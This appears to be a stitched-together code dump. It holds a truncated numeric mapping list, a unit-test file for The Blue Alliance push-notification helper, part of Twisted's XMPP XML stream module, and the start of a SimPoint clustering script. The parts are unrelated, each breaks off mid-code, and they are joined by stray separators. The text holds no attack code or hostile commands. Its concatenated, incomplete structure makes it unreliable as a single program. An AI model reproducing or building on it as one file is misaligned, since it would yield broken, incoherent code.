49365: "4361 4450 4532",
49366: "4361 4450 4533",
49367: "4361 4450 4534",
49368: "4361 4450 4535",
49369: "4361 4450 4536",
49370: "4361 4450 4537",
49371: "4361 4450 4538",
49372: "4361 4450 4539",
49373: "4361 4450 4540",
49374: "4361 4450 4541",
49375: "4361 4450 4542",
49376: "4361 4450 4543",
49377: "4361 4450 4544",
49378: "4361 4450 4545",
49379: "4361 4450 4546",
49380: "4361 4451",
49381: "4361 4451 4520",
49382: "4361 4451 4521",
49383: "4361 4451 4522",
49384: "4361 4451 4523",
49385: "4361 4451 4524",
49386: "4361 4451 4525",
49387: "4361 4451 4526",
49388: "4361 4451 4527",
49389: "4361 4451 4528",
49390: "4361 4451 4529",
49391: "4361 4451 4530",
49392: "4361 4451 4531",
49393: "4361 4451 4532",
49394: "4361 4451 4533",
49395: "4361 4451 4534",
49396: "4361 4451 4535",
49397: "4361 4451 4536",
49398: "4361 4451 4537",
49399: "4361 4451 4538",
49400: "4361 4451 4539",
49401: "4361 4451 4540",
49402: "4361 4451 4541",
49403: "4361 4451 4542",
49404: "4361 4451 4543",
49405: "4361 4451 4544",
49406: "4361 4451 4545",
49407: "4361 4451 4546",
49408: "4361 4452",
49409: "4361 4452 4520",
49410: "4361 4452 4521",
49411: "4361 4452 4522",
49412: "4361 4452 4523",
49413: "4361 4452 4524",
49414: "4361 4452 4525",
49415: "4361 4452 4526",
49416: "4361 4452 4527",
49417: "4361 4452 4528",
49418: "4361 4452 4529",
49419: "4361 4452 4530",
49420: "4361 4452 4531",
49421: "4361 4452 4532",
49422: "4361 4452 4533",
49423: "4361 4452 4534",
49424: "4361 4452 4535",
49425: "4361 4452 4536",
49426: "4361 4452 4537",
49427: "4361 4452 4538",
49428: "4361 4452 4539",
49429: "4361 4452 4540",
49430: "4361 4452 4541",
49431: "4361 4452 4542",
49432: "4361 4452 4543",
49433: "4361 4452 4544",
49434: "4361 4452 4545",
49435: "4361 4452 | |
<reponame>guineawheek/ftc-data-take-2
import datetime
from firebase_admin import messaging
from firebase_admin.exceptions import FirebaseError, InvalidArgumentError, InternalError, UnavailableError
from firebase_admin.messaging import QuotaExceededError, SenderIdMismatchError, ThirdPartyAuthError, UnregisteredError
import json
from mock import patch, Mock, ANY
import unittest2
from google.appengine.api.taskqueue import taskqueue
from google.appengine.ext import deferred
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from consts.award_type import AwardType
from consts.client_type import ClientType
from consts.event_type import EventType
from consts.model_type import ModelType
from consts.notification_type import NotificationType
import helpers.tbans_helper
from helpers.event.event_test_creator import EventTestCreator
from helpers.match.match_test_creator import MatchTestCreator
from helpers.tbans_helper import TBANSHelper, _firebase_app
from models.account import Account
from models.award import Award
from models.event import Event
from models.event_details import EventDetails
from models.match import Match
from models.team import Team
from models.mobile_client import MobileClient
from models.subscription import Subscription
from models.notifications.alliance_selection import AllianceSelectionNotification
from models.notifications.awards import AwardsNotification
from models.notifications.broadcast import BroadcastNotification
from models.notifications.event_level import EventLevelNotification
from models.notifications.event_schedule import EventScheduleNotification
from models.notifications.match_score import MatchScoreNotification
from models.notifications.match_upcoming import MatchUpcomingNotification
from models.notifications.match_video import MatchVideoNotification
from models.notifications.requests.fcm_request import FCMRequest
from models.notifications.requests.webhook_request import WebhookRequest
from tests.mocks.notifications.mock_notification import MockNotification
def fcm_messaging_ids(user_id):
clients = MobileClient.query(
MobileClient.client_type.IN(ClientType.FCM_CLIENTS),
ancestor=ndb.Key(Account, user_id)
).fetch(projection=[MobileClient.messaging_id])
return [c.messaging_id for c in clients]
class TestTBANSHelper(unittest2.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_datastore_v3_stub()
self.testbed.init_memcache_stub()
self.testbed.init_app_identity_stub()
self.testbed.init_taskqueue_stub(root_path='.')
self.taskqueue_stub = self.testbed.get_stub(testbed.TASKQUEUE_SERVICE_NAME)
ndb.get_context().clear_cache() # Prevent data from leaking between tests
self.event = EventTestCreator.createFutureEvent()
self.team = Team(
id='frc7332',
team_number=7332
)
self.team.put()
self.match = Match(
id='2020miket_qm1',
event=self.event.key,
comp_level='qm',
set_number=1,
match_number=1,
team_key_names=['frc7332'],
alliances_json=json.dumps({
'red': {
'teams': ['frc1', 'frc2', 'frc7332'],
'score': -1,
},
'blue': {
'teams': ['frc4', 'frc5', 'frc6'],
'score': -1,
}
}),
year=2020
)
def tearDown(self):
self.testbed.deactivate()
def test_firebase_app(self):
# Make sure we can get an original Firebase app
app_one = _firebase_app()
self.assertIsNotNone(app_one)
self.assertEqual(app_one.name, 'tbans')
# Make sure duplicate calls don't crash
app_two = _firebase_app()
self.assertIsNotNone(app_two)
self.assertEqual(app_two.name, 'tbans')
# Should be the same object
self.assertEqual(app_one, app_two)
def test_alliance_selection_no_users(self):
# Test send not called with no subscribed users
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.alliance_selection(self.event)
mock_send.assert_not_called()
def test_alliance_selection_user_id(self):
# Test send called with user id
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.alliance_selection(self.event, 'user_id')
mock_send.assert_called_once()
user_id = mock_send.call_args[0][0]
self.assertEqual(user_id, ['user_id'])
def test_alliance_selection(self):
# Insert a Subscription for this Event and these Teams so we call to send
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='frc1',
model_type=ModelType.TEAM,
notification_types=[NotificationType.ALLIANCE_SELECTION]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='frc7332',
model_type=ModelType.TEAM,
notification_types=[NotificationType.ALLIANCE_SELECTION]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_3'),
user_id='user_id_3',
model_key=self.event.key_name,
model_type=ModelType.EVENT,
notification_types=[NotificationType.ALLIANCE_SELECTION]
).put()
# Insert EventDetails for the event with alliance selection information
EventDetails(
id=self.event.key_name,
alliance_selections=[
{"declines": [], "picks": ["frc7332"]}
]
).put()
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.alliance_selection(self.event)
# Two calls total - First to the Event, second to frc7332, no call for frc1
mock_send.assert_called()
self.assertEqual(len(mock_send.call_args_list), 2)
self.assertEqual([x[0] for x in [call[0][0] for call in mock_send.call_args_list]], ['user_id_3', 'user_id_2'])
notifications = [call[0][1] for call in mock_send.call_args_list]
for notification in notifications:
self.assertTrue(isinstance(notification, AllianceSelectionNotification))
# Check Event notification
event_notification = notifications[0]
self.assertEqual(event_notification.event, self.event)
self.assertIsNone(event_notification.team)
# Check frc7332 notification
team_notification = notifications[1]
self.assertEqual(team_notification.event, self.event)
self.assertEqual(team_notification.team, self.team)
def test_awards_no_users(self):
# Test send not called with no subscribed users
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.awards(self.event)
mock_send.assert_not_called()
def test_awards_user_id(self):
# Test send called with user id
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.awards(self.event, 'user_id')
mock_send.assert_called_once()
user_id = mock_send.call_args[0][0]
self.assertEqual(user_id, ['user_id'])
def test_awards(self):
# Insert some Awards for some Teams
award = Award(
id=Award.render_key_name(self.event.key_name, AwardType.INDUSTRIAL_DESIGN),
name_str='Industrial Design Award sponsored by General Motors',
award_type_enum=AwardType.INDUSTRIAL_DESIGN,
event=self.event.key,
event_type_enum=EventType.REGIONAL,
team_list=[ndb.Key(Team, 'frc7332')],
year=2020
)
award.put()
winner_award = Award(
id=Award.render_key_name(self.event.key_name, AwardType.WINNER),
name_str='Regional Event Winner',
award_type_enum=AwardType.WINNER,
event=self.event.key,
event_type_enum=EventType.REGIONAL,
team_list=[ndb.Key(Team, 'frc7332'), ndb.Key(Team, 'frc1')],
year=2020
)
winner_award.put()
frc_1 = Team(
id='frc1',
team_number=1
)
frc_1.put()
# Insert a Subscription for this Event and these Teams so we call to send
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key='frc1',
model_type=ModelType.TEAM,
notification_types=[NotificationType.AWARDS]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='frc7332',
model_type=ModelType.TEAM,
notification_types=[NotificationType.AWARDS]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_3'),
user_id='user_id_3',
model_key=self.event.key_name,
model_type=ModelType.EVENT,
notification_types=[NotificationType.AWARDS]
).put()
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.awards(self.event)
# Three calls total - First to the Event, second to frc7332 (two awards), third to frc1 (one award)
mock_send.assert_called()
self.assertEqual(len(mock_send.call_args_list), 3)
self.assertEqual([x[0] for x in [call[0][0] for call in mock_send.call_args_list]], ['user_id_3', 'user_id_1', 'user_id_2'])
notifications = [call[0][1] for call in mock_send.call_args_list]
for notification in notifications:
self.assertTrue(isinstance(notification, AwardsNotification))
# Check Event notification
event_notification = notifications[0]
self.assertEqual(event_notification.event, self.event)
self.assertIsNone(event_notification.team)
self.assertEqual(event_notification.team_awards, [])
# Check frc1 notification
event_notification = notifications[1]
self.assertEqual(event_notification.event, self.event)
self.assertEqual(event_notification.team, frc_1)
self.assertEqual(len(event_notification.team_awards), 1)
# Check frc7332 notification
event_notification = notifications[2]
self.assertEqual(event_notification.event, self.event)
self.assertEqual(event_notification.team, self.team)
self.assertEqual(len(event_notification.team_awards), 2)
def test_broadcast_none(self):
from notifications.base_notification import BaseNotification
with patch.object(BaseNotification, 'send') as mock_send:
TBANSHelper.broadcast([], 'Broadcast', 'Test broadcast')
# Make sure we didn't send to Android
mock_send.assert_not_called()
# Make sure we didn't send to FCM or webhooks
tasks = self.taskqueue_stub.GetTasks('push-notifications')
self.assertEqual(len(tasks), 0)
def test_broadcast_fcm_empty(self):
from notifications.base_notification import BaseNotification
for client_type in ClientType.FCM_CLIENTS:
with patch.object(BaseNotification, 'send') as mock_send:
TBANSHelper.broadcast([client_type], 'Broadcast', 'Test broadcast')
# Make sure we didn't send to Android
mock_send.assert_not_called()
# Make sure we didn't send to FCM or webhooks
tasks = self.taskqueue_stub.GetTasks('push-notifications')
self.assertEqual(len(tasks), 0)
def test_broadcast_fcm(self):
for client_type in ClientType.FCM_CLIENTS:
client = MobileClient(
parent=ndb.Key(Account, 'user_id'),
user_id='user_id',
messaging_id='token',
client_type=client_type,
device_uuid='uuid',
display_name='Phone')
client_key = client.put()
from notifications.base_notification import BaseNotification
with patch.object(BaseNotification, 'send') as mock_send:
TBANSHelper.broadcast([client_type], 'Broadcast', 'Test broadcast')
# Make sure we didn't send to Android
mock_send.assert_not_called()
# Make sure we'll send to FCM clients
tasks = self.taskqueue_stub.get_filtered_tasks(queue_names='push-notifications')
self.assertEqual(len(tasks), 1)
# Make sure our taskqueue tasks execute what we expect
with patch.object(TBANSHelper, '_send_fcm') as mock_send_fcm:
deferred.run(tasks[0].payload)
mock_send_fcm.assert_called_once_with([client], ANY)
# Make sure the notification is a BroadcastNotification
notification = mock_send_fcm.call_args[0][1]
self.assertTrue(isinstance(notification, BroadcastNotification))
self.taskqueue_stub.FlushQueue('push-notifications')
client_key.delete()
def test_broadcast_webhook_empty(self):
from notifications.base_notification import BaseNotification
with patch.object(BaseNotification, 'send') as mock_send:
TBANSHelper.broadcast([ClientType.WEBHOOK], 'Broadcast', 'Test broadcast')
# Make sure we didn't send to Android
mock_send.assert_not_called()
# Make sure we didn't send to FCM or webhooks
tasks = self.taskqueue_stub.GetTasks('push-notifications')
self.assertEqual(len(tasks), 0)
def test_broadcast_webhook(self):
from notifications.base_notification import BaseNotification
client = MobileClient(
parent=ndb.Key(Account, 'user_id'),
user_id='user_id',
messaging_id='token',
client_type=ClientType.WEBHOOK,
device_uuid='uuid',
display_name='Phone')
client_key = client.put()
with patch.object(BaseNotification, 'send') as mock_send:
TBANSHelper.broadcast([ClientType.WEBHOOK], 'Broadcast', 'Test broadcast')
# Make sure we didn't send to Android
mock_send.assert_not_called()
# Make sure we'll send to FCM clients
tasks = self.taskqueue_stub.get_filtered_tasks(queue_names='push-notifications')
self.assertEqual(len(tasks), 1)
# Make sure our taskqueue tasks execute what we expect
with patch.object(TBANSHelper, '_send_webhook') as mock_send_webhook:
deferred.run(tasks[0].payload)
mock_send_webhook.assert_called_once_with([client], ANY)
# Make sure the notification is a BroadcastNotification
notification = mock_send_webhook.call_args[0][1]
self.assertTrue(isinstance(notification, BroadcastNotification))
def test_broadcast_android(self):
client_type = ClientType.OS_ANDROID
messaging_id = 'token'
client = MobileClient(
parent=ndb.Key(Account, 'user_id'),
user_id='user_id',
messaging_id=messaging_id,
client_type=client_type,
device_uuid='uuid',
display_name='Phone')
client.put()
from notifications.broadcast import BroadcastNotification
with patch.object(BroadcastNotification, 'send') as mock_send:
TBANSHelper.broadcast([client_type], 'Broadcast', 'Test broadcast')
mock_send.assert_called_once_with({client_type: [messaging_id]})
# Make sure we didn't send to FCM or webhooks
tasks = self.taskqueue_stub.GetTasks('push-notifications')
self.assertEqual(len(tasks), 0)
def test_event_level_no_users(self):
# Test send not called with no subscribed users
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.event_level(self.match)
mock_send.assert_not_called()
def test_event_level_user_id(self):
# Test send called with user id
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.event_level(self.match, 'user_id')
mock_send.assert_called()
self.assertEqual(len(mock_send.call_args_list), 1)
for call in mock_send.call_args_list:
self.assertEqual(call[0][0], ['user_id'])
def test_event_level(self):
# Insert a Subscription for this Event
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key=self.event.key_name,
model_type=ModelType.EVENT,
notification_types=[NotificationType.LEVEL_STARTING]
).put()
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.event_level(self.match)
mock_send.assert_called()
self.assertEqual(len(mock_send.call_args_list), 1)
user_ids = mock_send.call_args[0][0]
self.assertEqual(user_ids, ['user_id_1'])
notification = mock_send.call_args[0][1]
self.assertTrue(isinstance(notification, EventLevelNotification))
self.assertEqual(notification.match, self.match)
self.assertEqual(notification.event, self.event)
def test_event_schedule_no_users(self):
# Test send not called with no subscribed users
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.event_schedule(self.event)
mock_send.assert_not_called()
def test_event_schedule_user_id(self):
# Test send called with user id
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.event_schedule(self.event, 'user_id')
mock_send.assert_called()
self.assertEqual(len(mock_send.call_args_list), 1)
for call in mock_send.call_args_list:
self.assertEqual(call[0][0], ['user_id'])
def test_event_schedule(self):
# Insert a Subscription for this Event
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key=self.event.key_name,
model_type=ModelType.EVENT,
notification_types=[NotificationType.SCHEDULE_UPDATED]
).put()
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.event_schedule(self.event)
mock_send.assert_called()
self.assertEqual(len(mock_send.call_args_list), 1)
user_ids = mock_send.call_args[0][0]
self.assertEqual(user_ids, ['user_id_1'])
notification = mock_send.call_args[0][1]
self.assertTrue(isinstance(notification, EventScheduleNotification))
self.assertEqual(notification.event, self.event)
def test_match_score_no_users(self):
# Test send not called with no subscribed users
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.match_score(self.match)
mock_send.assert_not_called()
def test_match_score_user_id(self):
# Set some upcoming matches for the Event
match_creator = MatchTestCreator(self.event)
teams = [Team(id="frc%s" % team_number, team_number=team_number) for team_number in range(6)]
self.event._teams = teams
match_creator.createIncompleteQuals()
# Test send called with user id
with patch.object(TBANSHelper, '_send') as mock_send, patch.object(TBANSHelper, 'schedule_upcoming_match') as schedule_upcoming_match:
TBANSHelper.match_score(self.match, 'user_id')
mock_send.assert_called()
self.assertEqual(len(mock_send.call_args_list), 3)
for call in mock_send.call_args_list:
self.assertEqual(call[0][0], ['user_id'])
# Make sure we called upcoming_match with the same user_id
schedule_upcoming_match.assert_called()
self.assertEqual(len(schedule_upcoming_match.call_args_list), 1)
self.assertEqual(schedule_upcoming_match.call_args[0][1], 'user_id')
def test_match_score(self):
# Insert a Subscription for this Event, Team, and Match so we call to send
Subscription(
parent=ndb.Key(Account, 'user_id_1'),
user_id='user_id_1',
model_key=self.event.key_name,
model_type=ModelType.EVENT,
notification_types=[NotificationType.MATCH_SCORE]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_2'),
user_id='user_id_2',
model_key='frc7332',
model_type=ModelType.TEAM,
notification_types=[NotificationType.MATCH_SCORE]
).put()
Subscription(
parent=ndb.Key(Account, 'user_id_3'),
user_id='user_id_3',
model_key=self.match.key_name,
model_type=ModelType.MATCH,
notification_types=[NotificationType.MATCH_SCORE]
).put()
with patch.object(TBANSHelper, '_send') as mock_send:
TBANSHelper.match_score(self.match)
# Three calls total - First to the Event, second to Team | |
<gh_stars>1-10
# -*- test-case-name: twisted.words.test.test_jabberxmlstream -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
XMPP XML Streams
Building blocks for setting up XML Streams, including helping classes for
doing authentication on either client or server side, and working with XML
Stanzas.
"""
from hashlib import sha1
from zope.interface import directlyProvides, implements
from twisted.internet import defer, protocol
from twisted.internet.error import ConnectionLost
from twisted.python import failure, log, randbytes
from twisted.words.protocols.jabber import error, ijabber, jid
from twisted.words.xish import domish, xmlstream
from twisted.words.xish.xmlstream import STREAM_CONNECTED_EVENT
from twisted.words.xish.xmlstream import STREAM_START_EVENT
from twisted.words.xish.xmlstream import STREAM_END_EVENT
from twisted.words.xish.xmlstream import STREAM_ERROR_EVENT
try:
from twisted.internet import ssl
except ImportError:
ssl = None
if ssl and not ssl.supported:
ssl = None
STREAM_AUTHD_EVENT = intern("//event/stream/authd")
INIT_FAILED_EVENT = intern("//event/xmpp/initfailed")
NS_STREAMS = 'http://etherx.jabber.org/streams'
NS_XMPP_TLS = 'urn:ietf:params:xml:ns:xmpp-tls'
Reset = object()
def hashPassword(sid, password):
"""
Create a SHA1-digest string of a session identifier and password.
@param sid: The stream session identifier.
@type sid: C{unicode}.
@param password: The password to be hashed.
@type password: C{unicode}.
"""
if not isinstance(sid, unicode):
raise TypeError("The session identifier must be a unicode object")
if not isinstance(password, unicode):
raise TypeError("The password must be a unicode object")
input = u"%s%s" % (sid, password)
return sha1(input.encode('utf-8')).hexdigest()
class Authenticator:
"""
Base class for business logic of initializing an XmlStream
Subclass this object to enable an XmlStream to initialize and authenticate
to different types of stream hosts (such as clients, components, etc.).
Rules:
1. The Authenticator MUST dispatch a L{STREAM_AUTHD_EVENT} when the
stream has been completely initialized.
2. The Authenticator SHOULD reset all state information when
L{associateWithStream} is called.
3. The Authenticator SHOULD override L{streamStarted}, and start
initialization there.
@type xmlstream: L{XmlStream}
@ivar xmlstream: The XmlStream that needs authentication
@note: the term authenticator is historical. Authenticators perform
all steps required to prepare the stream for the exchange
of XML stanzas.
"""
def __init__(self):
self.xmlstream = None
def connectionMade(self):
"""
Called by the XmlStream when the underlying socket connection is
in place.
This allows the Authenticator to send an initial root element, if it's
connecting, or wait for an inbound root from the peer if it's accepting
the connection.
Subclasses can use self.xmlstream.send() to send any initial data to
the peer.
"""
def streamStarted(self, rootElement):
"""
Called by the XmlStream when the stream has started.
A stream is considered to have started when the start tag of the root
element has been received.
This examines C{rootElement} to see if there is a version attribute.
If absent, C{0.0} is assumed per RFC 3920. Subsequently, the
minimum of the version from the received stream header and the
value stored in L{xmlstream} is taken and put back in L{xmlstream}.
Extensions of this method can extract more information from the
stream header and perform checks on them, optionally sending
stream errors and closing the stream.
"""
if rootElement.hasAttribute("version"):
version = rootElement["version"].split(".")
try:
version = (int(version[0]), int(version[1]))
except (IndexError, ValueError):
version = (0, 0)
else:
version = (0, 0)
self.xmlstream.version = min(self.xmlstream.version, version)
def associateWithStream(self, xmlstream):
"""
Called by the XmlStreamFactory when a connection has been made
to the requested peer, and an XmlStream object has been
instantiated.
The default implementation just saves a handle to the new
XmlStream.
@type xmlstream: L{XmlStream}
@param xmlstream: The XmlStream that will be passing events to this
Authenticator.
"""
self.xmlstream = xmlstream
class ConnectAuthenticator(Authenticator):
"""
Authenticator for initiating entities.
"""
namespace = None
def __init__(self, otherHost):
self.otherHost = otherHost
def connectionMade(self):
self.xmlstream.namespace = self.namespace
self.xmlstream.otherEntity = jid.internJID(self.otherHost)
self.xmlstream.sendHeader()
def initializeStream(self):
"""
Perform stream initialization procedures.
An L{XmlStream} holds a list of initializer objects in its
C{initializers} attribute. This method calls these initializers in
order and dispatches the C{STREAM_AUTHD_EVENT} event when the list has
been successfully processed. Otherwise it dispatches the
C{INIT_FAILED_EVENT} event with the failure.
Initializers may return the special L{Reset} object to halt the
initialization processing. It signals that the current initializer was
successfully processed, but that the XML Stream has been reset. An
example is the TLSInitiatingInitializer.
"""
def remove_first(result):
self.xmlstream.initializers.pop(0)
return result
def do_next(result):
"""
Take the first initializer and process it.
On success, the initializer is removed from the list and
then next initializer will be tried.
"""
if result is Reset:
return None
try:
init = self.xmlstream.initializers[0]
except IndexError:
self.xmlstream.dispatch(self.xmlstream, STREAM_AUTHD_EVENT)
return None
else:
d = defer.maybeDeferred(init.initialize)
d.addCallback(remove_first)
d.addCallback(do_next)
return d
d = defer.succeed(None)
d.addCallback(do_next)
d.addErrback(self.xmlstream.dispatch, INIT_FAILED_EVENT)
def streamStarted(self, rootElement):
"""
Called by the XmlStream when the stream has started.
This extends L{Authenticator.streamStarted} to extract further stream
headers from C{rootElement}, optionally wait for stream features being
received and then call C{initializeStream}.
"""
Authenticator.streamStarted(self, rootElement)
self.xmlstream.sid = rootElement.getAttribute("id")
if rootElement.hasAttribute("from"):
self.xmlstream.otherEntity = jid.internJID(rootElement["from"])
# Setup observer for stream features, if applicable
if self.xmlstream.version >= (1, 0):
def onFeatures(element):
features = {}
for feature in element.elements():
features[(feature.uri, feature.name)] = feature
self.xmlstream.features = features
self.initializeStream()
self.xmlstream.addOnetimeObserver('/features[@xmlns="%s"]' %
NS_STREAMS,
onFeatures)
else:
self.initializeStream()
class ListenAuthenticator(Authenticator):
"""
Authenticator for receiving entities.
"""
namespace = None
def associateWithStream(self, xmlstream):
"""
Called by the XmlStreamFactory when a connection has been made.
Extend L{Authenticator.associateWithStream} to set the L{XmlStream}
to be non-initiating.
"""
Authenticator.associateWithStream(self, xmlstream)
self.xmlstream.initiating = False
def streamStarted(self, rootElement):
"""
Called by the XmlStream when the stream has started.
This extends L{Authenticator.streamStarted} to extract further
information from the stream headers from C{rootElement}.
"""
Authenticator.streamStarted(self, rootElement)
self.xmlstream.namespace = rootElement.defaultUri
if rootElement.hasAttribute("to"):
self.xmlstream.thisEntity = jid.internJID(rootElement["to"])
self.xmlstream.prefixes = {}
for prefix, uri in rootElement.localPrefixes.iteritems():
self.xmlstream.prefixes[uri] = prefix
self.xmlstream.sid = unicode(randbytes.secureRandom(8).encode('hex'))
class FeatureNotAdvertized(Exception):
"""
Exception indicating a stream feature was not advertized, while required by
the initiating entity.
"""
class BaseFeatureInitiatingInitializer(object):
"""
Base class for initializers with a stream feature.
This assumes the associated XmlStream represents the initiating entity
of the connection.
@cvar feature: tuple of (uri, name) of the stream feature root element.
@type feature: tuple of (C{str}, C{str})
@ivar required: whether the stream feature is required to be advertized
by the receiving entity.
@type required: C{bool}
"""
implements(ijabber.IInitiatingInitializer)
feature = None
required = False
def __init__(self, xs):
self.xmlstream = xs
def initialize(self):
"""
Initiate the initialization.
Checks if the receiving entity advertizes the stream feature. If it
does, the initialization is started. If it is not advertized, and the
C{required} instance variable is C{True}, it raises
L{FeatureNotAdvertized}. Otherwise, the initialization silently
succeeds.
"""
if self.feature in self.xmlstream.features:
return self.start()
elif self.required:
raise FeatureNotAdvertized
else:
return None
def start(self):
"""
Start the actual initialization.
May return a deferred for asynchronous initialization.
"""
class TLSError(Exception):
"""
TLS base exception.
"""
class TLSFailed(TLSError):
"""
Exception indicating failed TLS negotiation
"""
class TLSRequired(TLSError):
"""
Exception indicating required TLS negotiation.
This exception is raised when the receiving entity requires TLS
negotiation and the initiating does not desire to negotiate TLS.
"""
class TLSNotSupported(TLSError):
"""
Exception indicating missing TLS support.
This exception is raised when the initiating entity wants and requires to
negotiate TLS when the OpenSSL library is not available.
"""
class TLSInitiatingInitializer(BaseFeatureInitiatingInitializer):
"""
TLS stream initializer for the initiating entity.
It is strongly required to include this initializer in the list of
initializers for an XMPP stream. By default it will try to negotiate TLS.
An XMPP server may indicate that TLS is required. If TLS is not desired,
set the C{wanted} attribute to False instead of removing it from the list
of initializers, so a proper exception L{TLSRequired} can be raised.
@cvar wanted: indicates if TLS negotiation is wanted.
@type wanted: C{bool}
"""
feature = (NS_XMPP_TLS, 'starttls')
wanted = True
_deferred = None
def onProceed(self, obj):
"""
Proceed with TLS negotiation and reset the XML stream.
"""
self.xmlstream.removeObserver('/failure', self.onFailure)
ctx = ssl.CertificateOptions()
self.xmlstream.transport.startTLS(ctx)
self.xmlstream.reset()
self.xmlstream.sendHeader()
self._deferred.callback(Reset)
def onFailure(self, obj):
self.xmlstream.removeObserver('/proceed', self.onProceed)
self._deferred.errback(TLSFailed())
def start(self):
"""
Start TLS negotiation.
This checks if the receiving entity requires TLS, the SSL library is
available and uses the C{required} and C{wanted} instance variables to
determine what to do in the various different cases.
For example, if the SSL library is not available, and wanted and
required by the user, it raises an exception. However if it is not
required by both parties, initialization silently succeeds, moving
on to the next step.
"""
| |
<filename>DrAnalysis.py
#!/usr/bin/env python
# Copyright (c) 2020, Arm Limited and Contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import os
import subprocess
import argparse
import gzip
import functools
import json
from itertools import product
import sys
class SimPoints(object):
def __init__(self, BBfile='bbvbarrier.bb.gz', fixedLength='off',
deleteSPOut=False, maxK=20, dim=15, outputfiles='./'):
self.logger = logging.getLogger('BarrierPoint.simpoint')
self.BBfile = BBfile # unprojected sparse-format frequency vector file
# the file is compressed with gzip (-inputVectorsGzipped)
self.extraOpts = [] # extra-options if needed
self.execF = './simpoint'
self.fixedLength = fixedLength
if fixedLength == 4:
self.fixedLength = 'on'
# initialize k-means by sampling
self.extraOpts.append('-initkm samp')
self.execF = './simpoint.normalize2'
elif fixedLength == 3:
self.fixedLength = 'on'
self.extraOpts.append('-initkm samp')
self.execF = './simpoint.normalize'
elif fixedLength == 2 or fixedLength == 'normalize':
self.fixedLength = 'on'
# initialize k-means by furtherst-first
self.extraOpts.append('-initkm ff')
self.execF = './simpoint.normalize'
elif fixedLength not in ('off', 'on'):
self.fixedLength = {False: 'off', True: 'on'}[bool(fixedLength)]
# specifies if the vectors provided are fixed-length
# (for barrier points they are not)
self.deleteSPOut = deleteSPOut # keep temporal files ?
self.tSimPoints = '{}t.simpoints'.format(outputfiles)
self.tWeights = '{}t.weights'.format(outputfiles)
self.tLabels = '{}t.labels'.format(outputfiles)
# using 'search' (binary search for values of k), maximum number of clusters
self.maxK = maxK # original SimPoint value: 15, original BP value: 20
self.dim = 'noProject' if (dim == 0) else dim
# number of dimensions down to randomly project the frequency vectors
# default value is 15
self.execCmd = """{} -loadFVFile "{}" -inputVectorsGzipped -fixedLength {} -maxK {} -dim {} \
-coveragePct 1.0 -saveSimpoints {} -saveSimpointWeights {} -saveLabels {} \
-verbose 0 {}""".format(self.execF, self.BBfile, self.fixedLength, self.maxK,
self.dim, self.tSimPoints, self.tWeights, self.tLabels,
' '.join(self.extraOpts))
self.SPData = dict() # result of the clustering
# Call the SimPoint tool
self.logger.info('Starting SimPoint')
if not self.RunSimPoints():
self.logger.error('SimPoint clustering failed')
self.logger.info('Finished SimPoint')
def getSimPointData(self):
# Returns the results of the SimPoint clustering
# SPData is a dictionary of lists; keys: id, weigths, simpoints, labels, match
return self.SPData
def RunSimPoints(self):
# Runs the SimPoint clustering
self.logger.debug("Executing command:\n{}".format(self.execCmd))
proc = subprocess.Popen(['bash', '-c', self.execCmd])
proc.communicate()
if proc.returncode != 0:
self.logger.warn("Process {} returned {} code".format(
self.execCmd, proc.returncode))
return False
self.logger.debug('Data analysis')
if not self.AnalysisSimPoints():
self.logger.warn('SimPoints analysis returned with errors')
return False
return True
def AnalysisSimPoints(self):
# Parses the output from SimPoint
# To compute SimPoints we are skipping the first BP, the one from the start of the ROI
# to the first parallel region; however, to ease the performance evaluation
# with performance counters we assume that BP to be #0.
# Hence, we have to shift the BP identifiers by 1 afterwards.
self.SPData['id'] = []
self.SPData['weights'] = []
# tWeights file has the following format: weight id
try:
_wfile = open(self.tWeights, 'r')
for line in _wfile:
weight, num = line.split()
self.SPData['id'].append(int(num))
self.SPData['weights'].append(float(weight))
_wfile.close()
except OSError as err:
self.logger.error('{} tWeights: {}'.format(err, self.tWeights))
return False
self.SPData['simpoints'] = []
# tSimPoints file has the following format:
# simpoint id
try:
_sfile = open(self.tSimPoints, 'r')
for i, line in enumerate(_sfile):
sp, num = line.split()
if int(num) != self.SPData['id'][i]:
self.logger.error('Invalid SimPoint index')
return False
self.SPData['simpoints'].append(int(sp))
_sfile.close()
except OSError as err:
self.logger.error(
'{} tSimPoints: {}'.format(err, self.tSimPoints))
return False
self.SPData['labels'] = []
self.SPData['match'] = []
# tLabels file has the following format: label match
# where label is the id of the assigned cluster for each barrier point
# and match is the distance from center of each input vector (i.e., barrier point)
try:
_lfile = open(self.tLabels, 'r')
for line in _lfile:
label, match = line.split()
